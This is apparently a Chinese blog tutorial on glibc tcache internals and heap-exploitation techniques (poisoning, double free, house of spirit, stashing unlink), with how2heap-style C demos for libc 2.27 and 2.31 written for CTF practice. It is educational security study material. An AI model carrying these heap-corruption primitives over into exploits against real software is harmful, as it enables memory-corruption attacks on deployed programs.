堆漏洞系列（二）-- tache bin attack

一直以来都是做libc-2.23的堆题，tache也很少涉及，这次来系统的看一下tache这个在libc-2.26版本中新引入的机制到底是怎么样的？它有什么奇妙的玩法？一起来看看吧

原理

tache新增了两个结构体，一个是 tcache_entry ，另一个是tcache_perthread_struct

typedef struct tcache_entry
{
  struct tcache_entry *next;
} tcache_entry;

typedef struct tcache_perthread_struct
{
  char counts[TCACHE_MAX_BINS];
  tcache_entry *entries[TCACHE_MAX_BINS];
} tcache_perthread_struct;

有两个特别重要的函数，是关于tache链入和脱链的操作，可以看到tache链入和脱链的检查十分的少，跟fastbin相比真的不多，甚至可以说没有检查…，所以说tache的存在让堆利用更简单了一点，所以说不要怕，它并不可怕！

fastbin有对size进行检查，如果size不同放在同一个链表里面就会报错，tache没得
fastbin有double free检查，在早期的tache中也没有

链入：

static void tcache_put (mchunkptr chunk, size_t tc_idx)
{
  tcache_entry *e = (tcache_entry *) chunk2mem (chunk);
  assert (tc_idx < TCACHE_MAX_BINS);
  e->next = tcache->entries[tc_idx];
  tcache->entries[tc_idx] = e;
  ++(tcache->counts[tc_idx]);
}

脱链：

static void * tcache_get (size_t tc_idx)
{
  tcache_entry *e = tcache->entries[tc_idx];
  assert (tc_idx < TCACHE_MAX_BINS);
  assert (tcache->entries[tc_idx] > 0);
  tcache->entries[tc_idx] = e->next;
  --(tcache->counts[tc_idx]);
  return (void *) e;
}

先写个demo简单认识一下tache在bin中的怎么样的…

#include <stdio.h>

int main(void){
    //查看tache
	void *chunk_1,*chunk_2,*chunk_3,*chunk_4;
	void *chunk_5,*chunk_6,*chunk_7;

	chunk_1 = malloc(0x10);
	chunk_2 = malloc(0x20);
	chunk_3 = malloc(0x30);
	chunk_4 = malloc(0x40);
	chunk_5 = malloc(0x50);
	chunk_6 = malloc(0x60);
	chunk_7 = malloc(0x70);

	free(chunk_1);
	free(chunk_2);
	free(chunk_3);
	free(chunk_4);
	free(chunk_5);
	free(chunk_6);
	free(chunk_7);
    
	//宏定义define TCACHE_FILL_COUNT 7
	void *c1,*c2,*c3,*c4,*c5,*c6,*c7,*c8;

	c1 = malloc(0x20);
	c2 = malloc(0x20);
	c3 = malloc(0x20);
	c4 = malloc(0x20);
	c5 = malloc(0x20);
	c6 = malloc(0x20);
	c7 = malloc(0x20);
	c8 = malloc(0x20);

	free(c1);
	free(c2);
	free(c3);
	free(c4);
	free(c5);
	free(c6);
	free(c7);
	free(c8);
	
	return 0;
}

运行之后看bin，我们看到fastbin已经有了一个堆块，说明tache最多只能存放7个堆块，这也是tache可玩的机制之一

还记得tcache_perthread_struct这个结构体吗？系统为它分配了一个0x250的堆块来存放这个结构体的内容，我们来看看里面的内容，上面的小框框是记录堆块数量的，从0x20开始一直到0x400，一般的利用也到不了0x400，所以就没展示，下面的大框框就是各个大小的堆块首个堆块的地址，可以对比上图来看

引用wiki上的一段话

在内存分配的malloc函数中有多处，会将内存块移入tcache中。

（1）首先，申请的内存块符合fastbin大小时并且在fastbin内找到可用的空闲块时，会把该fastbin链上的其他内存块放入tcache中。

（2）其次，申请的内存块符合smallbin大小时并且在smallbin内找到可用的空闲块时，会把该smallbin链上的其他内存块放入tcache中。

（3）当在unsorted bin链上循环处理时，当找到大小合适的链时，并不直接返回，而是先放到tcache中，继续处理。

其实也很好理解，就是分配的时候会先从tache中取，然后把符合对应大小的堆块的整理到tache中，改一下上面的代码：

#include <stdio.h>

int main(void){

	void *c1,*c2,*c3,*c4,*c5,*c6,*c7,*c8;
	void *c9,*c10;
	c1 = malloc(0x20);
	c2 = malloc(0x20);
	c3 = malloc(0x20);
	c4 = malloc(0x20);
	c5 = malloc(0x20);
	c6 = malloc(0x20);
	c7 = malloc(0x20);
	c8 = malloc(0x20);
	c9 = malloc(0x20);
	c10 = malloc(0x20);

	free(c1);
	free(c2);
	free(c3);
	free(c4);
	free(c5);
	free(c6);
	free(c7);
	free(c8);
	free(c9);
	free(c10);

	malloc(0x20);
	malloc(0x20);
	malloc(0x20);//断点


	return 0;
}

下断点之后，发现malloc三个堆块fastbin里面一个都没动，全部都是tache里面拿的

但是tache里面的拿完了之后，它就会去fastbin里面拿，拿了之后还没完还要把fastbin里面的堆块放到tache里面去，下面是代码：

#include <stdio.h>
#include <stdlib.h>

int main(void){

	void *c1,*c2,*c3,*c4,*c5,*c6,*c7,*c8;
	void *c9,*c10;
	c1 = malloc(0x20);
	c2 = malloc(0x20);
	c3 = malloc(0x20);
	c4 = malloc(0x20);
	c5 = malloc(0x20);
	c6 = malloc(0x20);
	c7 = malloc(0x20);
	c8 = malloc(0x20);
	c9 = malloc(0x20);
	c10 = malloc(0x20);

	free(c1);
	free(c2);
	free(c3);
	free(c4);
	free(c5);
	free(c6);
	free(c7);
	free(c8);
	free(c9);
	free(c10);

	malloc(0x20);
	malloc(0x20);
	malloc(0x20);
	malloc(0x20);
	malloc(0x20);
	malloc(0x20);
	malloc(0x20);//tache里面已经分配完
	malloc(0x20);

	return 0;
}

讲完了tache的一些原理性的东西，接下来看看如何攻击的：

demo

libc-2.27.so

tcache poisoning

拿how2heap的代码来演示，目的是任意地址分配，分配到栈上的地址

#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <assert.h>

int main()
{
	setbuf(stdin, NULL);
	setbuf(stdout, NULL);
    
	size_t stack_var;
	printf("The address we want malloc() to return is %p.\n", (char *)&stack_var);
    
	printf("Allocating 2 buffers.\n");
	intptr_t *a = malloc(128);
	printf("malloc(128): %p\n", a);
	intptr_t *b = malloc(128);
	printf("malloc(128): %p\n", b);

	printf("Freeing the buffers...\n");
	free(a);
	free(b);

	printf("Now the tcache list has [ %p -> %p ].\n", b, a);
	printf("We overwrite the first %lu bytes (fd/next pointer) of the data at %p\n"
		   "to point to the location to control (%p).\n", sizeof(intptr_t), b, &stack_var);
	b[0] = (intptr_t)&stack_var;
	printf("Now the tcache list has [ %p -> %p ].\n", b, &stack_var);

	printf("1st malloc(128): %p\n", malloc(128));
	printf("Now the tcache list has [ %p ].\n", &stack_var);

	intptr_t *c = malloc(128);
	printf("2nd malloc(128): %p\n", c);
	printf("We got the control\n");

	assert((long)&stack_var == (long)c);
	return 0;
}

分配两个堆块之后，修改b的fd指针指向栈，如下图所示：

再分配两个堆块就获得了栈的控制权

总结一下：由于tache并不会检查同一链表里面的堆块大小是否相等，所以才可以把栈指针链入tache，然后再分配出来，这比fastbin attack方便多啦！，fastbin attack还得检查堆块大小，所以fastbin attack都是把__malloc_hook - 0x23链入再分配出来，对吧！

tcache_dup

这个攻击手法已经不太适用了，tache_dup很简单，就free两次，不赘述了，因为补丁已经给到了libc-2.27.so，上次打一道tache的题，很疑惑，为啥我的tache_dup就报错了呢？后面找到下面这个资料：

[总结型]记CTF PWN中过气的堆利用

#include <stdio.h>
#include <stdlib.h>
#include <assert.h>

int main()
{
	printf("This file demonstrates a simple double-free attack with tcache.\n");

	printf("Allocating buffer.\n");
	int *a = malloc(8);

	printf("malloc(8): %p\n", a);
	printf("Freeing twice...\n");
	free(a);
	free(a);

	printf("Now the free list has [ %p, %p ].\n", a, a);
	void *b = malloc(8);
	void *c = malloc(8);
	printf("Next allocated buffers will be same: [ %p, %p ].\n", b, c);

	assert((long)b == (long)c);
	return 0;
}

tcache_house_of_spirit

这个攻击手法看起来很离谱，只是单纯的一个数组并伪造了一个size，然后定义了一个指针指向了此数组的&fake_chunks[2]，在free就把它给放进了tache…，原因是由于tcache_put()函数检查不严格造成的，在释放的时候没有检查被释放的指针是否真的是堆块的malloc指针

#include <stdio.h>
#include <stdlib.h>
#include <assert.h>

int main()
{
	setbuf(stdout, NULL);
    
	printf("Calling malloc() once so that it sets up its memory.\n");
	malloc(1);

	printf("Let's imagine we will overwrite 1 pointer to point to a fake chunk region.\n");
	unsigned long long *a; //pointer that will be overwritten
	unsigned long long fake_chunks[10]; //fake chunk region

	printf("This region contains one fake chunk. It's size field is placed at %p\n", &fake_chunks[1]);

	fake_chunks[1] = 0x40; // this is the size

	printf("Now we will overwrite our pointer with the address of the fake region inside the fake first chunk, %p.\n", &fake_chunks[1]);
	printf("... note that the memory address of the *region* associated with this chunk must be 16-byte aligned.\n");

	a = &fake_chunks[2];

	free(a);

	printf("Now the next malloc will return the region of our fake chunk at %p, which will be %p!\n", &fake_chunks[1], &fake_chunks[2]);
	void *b = malloc(0x30);
	printf("malloc(0x30): %p\n", b);

	assert((long)b == (long)&fake_chunks[2]);
}

下面是fake_chunks，可以看到伪造了个size：

free之后就能看到tache里面有这个堆块了，再申请出来就得到了此块地址的控制器：

tcache_stashing_unlink_attack

这个攻击手法就稍微精巧一点，没有之前的这么简单粗暴，我们一步步来看！

#include <stdio.h>
#include <stdlib.h>
#include <assert.h>

int main(){
    unsigned long stack_var[0x10] = {0};
    unsigned long *chunk_lis[0x10] = {0};
    unsigned long *target;

    setbuf(stdout, NULL);
	//查看地址 
    printf("stack_var addr is:%p\n",&stack_var[0]);
    printf("chunk_lis addr is:%p\n",&chunk_lis[0]);
    printf("target addr is:%p\n",(void*)target);

    stack_var[3] = (unsigned long)(&stack_var[2]);

    printf("You can see the value of fake_chunk->bk is:%p\n\n",(void*)stack_var[3]);
    printf("Also, let's see the initial value of stack_var[4]:%p\n\n",(void*)stack_var[4]);
    printf("Now we alloc 9 chunks with malloc.\n\n");

    //now we malloc 9 chunks
    for(int i = 0;i < 9;i++){
        chunk_lis[i] = (unsigned long*)malloc(0x90);
    }

    //put 7 chunks into tcache
    printf("Then we free 7 of them in order to put them into tcache. Carefully we didn't free a serial of chunks like chunk2 to chunk9, because an unsorted bin next to another will be merged into one after another malloc.\n\n");

    for(int i = 3;i < 9;i++){
        free(chunk_lis[i]);
    }

    printf("As you can see, chunk1 & [chunk3,chunk8] are put into tcache bins while chunk0 and chunk2 will be put into unsorted bin.\n\n");

    //last tcache bin
    free(chunk_lis[1]);
    //now they are put into unsorted bin
    free(chunk_lis[0]);
    free(chunk_lis[2]);

    //convert into small bin
    printf("Now we alloc a chunk larger than 0x90 to put chunk0 and chunk2 into small bin.\n\n");

    malloc(0xa0);// size > 0x90

    //now 5 tcache bins
    printf("Then we malloc two chunks to spare space for small bins. After that, we now have 5 tcache bins and 2 small bins\n\n");

    malloc(0x90);
    malloc(0x90);

    printf("Now we emulate a vulnerability that can overwrite the victim->bk pointer into fake_chunk addr: %p.\n\n",(void*)stack_var);

    //change victim->bck
    /*VULNERABILITY*/
    chunk_lis[2][1] = (unsigned long)stack_var;
    /*VULNERABILITY*/

    //trigger the attack
    printf("Finally we alloc a 0x90 chunk with calloc to trigger the attack. The small bin preiously freed will be returned to user, the other one and the fake_chunk were linked into tcache bins.\n\n");

    calloc(1,0x90);

    printf("Now our fake chunk has been put into tcache bin[0xa0] list. Its fd pointer now point to next free chunk: %p and the bck->fd has been changed into a libc addr: %p\n\n",(void*)stack_var[2],(void*)stack_var[4]);

    //malloc and return our fake chunk on stack
    target = malloc(0x90);   

    printf("As you can see, next malloc(0x90) will return the region our fake chunk: %p\n",(void*)target);

    assert(target == &stack_var[2]);
    return 0;
}

在stack_var[3]放&stack_var[2]的原因是为了绕过unlink的检查，bck->fd = bin;和bin->bk = bck;

1	stack_var[3] = (unsigned long)(&stack_var[2]);

申请了9个0x90大小的堆块，并把他们都放进了chunk_lis这个数组里面：

1
2
3

for(int i = 0;i < 9;i++){
    chunk_lis[i] = (unsigned long*)malloc(0x90);
}

再free掉6个堆块，再free掉一个之后tache就满了，再往下free的堆块就将进到unsorted bin里面，chunk_lis[0]和chunk_lis[0]为什么要隔开呢？是怕它俩合并

for(int i = 3;i < 9;i++){
    free(chunk_lis[i]);
}
//last tcache bin
free(chunk_lis[1]);
//now they are put into unsorted bin
free(chunk_lis[0]);
free(chunk_lis[2]);

之后分配一个0xa0大小的堆块，它会先到tache bin里面寻找，发现并没有这个大小的堆块，又到unsorted bin里面找，还是没找到，没找到归没找到，它还是会把unsorted bin里面的堆块整理到对应大小的bin中，所以chunk_lis[0]和chunk_lis[2]会进到small bin，由于在bin中没有这个大小的堆块，所以它直接调用brk来创建堆块

1	malloc(0xa0);// size > 0x90

此时malloc 0x90就是直接从tache里面拿，为什么要这样做呢？是为了给chunk_lis[0]和chunk_lis[2]留出位置，等会就能看到

1 2	malloc(0x90); malloc(0x90);

之后把chunk3也就是0x603390这个堆块的bk修改成stack_var

1	chunk_lis[2][1] = (unsigned long)stack_var;

calloc有个特点，就是不会去tache里面拿堆块，不去拿就算了，还要把对应大小的堆块放进tache里面，这就正好了呀！这直接就把stack_var放进tache

1	calloc(1,0x90);

由于第一个堆块就是stack_var，直接malloc就能得到栈上的控制权

1	target = malloc(0x90);

gyctf_2020_signin这题差不多就是按照tcache_stashing_unlink_attack改编而成的，感兴趣可以去看看《buu刷题记之PWN系列》，calloc的细节也有提到…

libc-2.31.so

tcache_poisoning

和libc-2.27.so一样的，不多说了….

#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <assert.h>

int main()
{
	// disable buffering
	setbuf(stdin, NULL);
	setbuf(stdout, NULL);

	size_t stack_var;
	printf("The address we want malloc() to return is %p.\n", (char *)&stack_var);

	printf("Allocating 2 buffers.\n");
	intptr_t *a = malloc(128);
	printf("malloc(128): %p\n", a);
	intptr_t *b = malloc(128);
	printf("malloc(128): %p\n", b);

	printf("Freeing the buffers...\n");
	free(a);
	free(b);

	printf("Now the tcache list has [ %p -> %p ].\n", b, a);
	printf("We overwrite the first %lu bytes (fd/next pointer) of the data at %p\n"
		   "to point to the location to control (%p).\n", sizeof(intptr_t), b, &stack_var);
	b[0] = (intptr_t)&stack_var;
	printf("Now the tcache list has [ %p -> %p ].\n", b, &stack_var);

	printf("1st malloc(128): %p\n", malloc(128));
	printf("Now the tcache list has [ %p ].\n", &stack_var);

	intptr_t *c = malloc(128);
	printf("2nd malloc(128): %p\n", c);
	printf("We got the control\n");

	assert((long)&stack_var == (long)c);
	return 0;
}

tcache_house_of_spirit

死性不改呀！😂

#include <stdio.h>
#include <stdlib.h>
#include <assert.h>

int main()
{
	setbuf(stdout, NULL);


	printf("Calling malloc() once so that it sets up its memory.\n");
	malloc(1);

	printf("Let's imagine we will overwrite 1 pointer to point to a fake chunk region.\n");
	unsigned long long *a; //pointer that will be overwritten
	unsigned long long fake_chunks[10]; //fake chunk region

	printf("This region contains one fake chunk. It's size field is placed at %p\n", &fake_chunks[1]);

	printf("This chunk size has to be falling into the tcache category (chunk.size <= 0x410; malloc arg <= 0x408 on x64). The PREV_INUSE (lsb) bit is ignored by free for tcache chunks, however the IS_MMAPPED (second lsb) and NON_MAIN_ARENA (third lsb) bits cause problems.\n");
	printf("... note that this has to be the size of the next malloc request rounded to the internal size used by the malloc implementation. E.g. on x64, 0x30-0x38 will all be rounded to 0x40, so they would work for the malloc parameter at the end. \n");
	fake_chunks[1] = 0x40; // this is the size


	printf("Now we will overwrite our pointer with the address of the fake region inside the fake first chunk, %p.\n", &fake_chunks[1]);
	printf("... note that the memory address of the *region* associated with this chunk must be 16-byte aligned.\n");

	a = &fake_chunks[2];

	printf("Freeing the overwritten pointer.\n");
	free(a);

	printf("Now the next malloc will return the region of our fake chunk at %p, which will be %p!\n", &fake_chunks[1], &fake_chunks[2]);
	void *b = malloc(0x30);
	printf("malloc(0x30): %p\n", b);

	assert((long)b == (long)&fake_chunks[2]);
}

tcache_stashing_unlink_attack

写了个寂寞….

#include <stdio.h>
#include <stdlib.h>
#include <assert.h>

int main(){
    unsigned long stack_var[0x10] = {0};
    unsigned long *chunk_lis[0x10] = {0};
    unsigned long *target;

    setbuf(stdout, NULL);

    // stack_var emulate the fake_chunk we want to alloc to
    printf("Stack_var emulates the fake chunk we want to alloc to.\n\n");
    printf("First let's write a writeable address to fake_chunk->bk to bypass bck->fd = bin in glibc. Here we choose the address of stack_var[2] as the fake bk. Later we can see *(fake_chunk->bk + 0x10) which is stack_var[4] will be a libc addr after attack.\n\n");

    stack_var[3] = (unsigned long)(&stack_var[2]);

    printf("You can see the value of fake_chunk->bk is:%p\n\n",(void*)stack_var[3]);
    printf("Also, let's see the initial value of stack_var[4]:%p\n\n",(void*)stack_var[4]);
    printf("Now we alloc 9 chunks with malloc.\n\n");

    //now we malloc 9 chunks
    for(int i = 0;i < 9;i++){
        chunk_lis[i] = (unsigned long*)malloc(0x90);
    }

    //put 7 chunks into tcache
    printf("Then we free 7 of them in order to put them into tcache. Carefully we didn't free a serial of chunks like chunk2 to chunk9, because an unsorted bin next to another will be merged into one after another malloc.\n\n");

    for(int i = 3;i < 9;i++){
        free(chunk_lis[i]);
    }

    printf("As you can see, chunk1 & [chunk3,chunk8] are put into tcache bins while chunk0 and chunk2 will be put into unsorted bin.\n\n");

    //last tcache bin
    free(chunk_lis[1]);
    //now they are put into unsorted bin
    free(chunk_lis[0]);
    free(chunk_lis[2]);

    //convert into small bin
    printf("Now we alloc a chunk larger than 0x90 to put chunk0 and chunk2 into small bin.\n\n");

    malloc(0xa0);// size > 0x90

    //now 5 tcache bins
    printf("Then we malloc two chunks to spare space for small bins. After that, we now have 5 tcache bins and 2 small bins\n\n");

    malloc(0x90);
    malloc(0x90);

    printf("Now we emulate a vulnerability that can overwrite the victim->bk pointer into fake_chunk addr: %p.\n\n",(void*)stack_var);

    //change victim->bck
    /*VULNERABILITY*/
    chunk_lis[2][1] = (unsigned long)stack_var;
    /*VULNERABILITY*/

    //trigger the attack
    printf("Finally we alloc a 0x90 chunk with calloc to trigger the attack. The small bin preiously freed will be returned to user, the other one and the fake_chunk were linked into tcache bins.\n\n");

    calloc(1,0x90);

    printf("Now our fake chunk has been put into tcache bin[0xa0] list. Its fd pointer now point to next free chunk: %p and the bck->fd has been changed into a libc addr: %p\n\n",(void*)stack_var[2],(void*)stack_var[4]);

    //malloc and return our fake chunk on stack
    target = malloc(0x90);   

    printf("As you can see, next malloc(0x90) will return the region our fake chunk: %p\n",(void*)target);

    assert(target == &stack_var[2]);
    return 0;
}

题目

参考《buu刷题记之PWN系列》

小结

总的来说，加入tache让堆题的可玩性增加了不少，但利用的手法都不是很复杂，只能说开发者在安全性和效率之间，更偏向于效率，才导致这么多问题出现，以前对tache的题目很恐慌。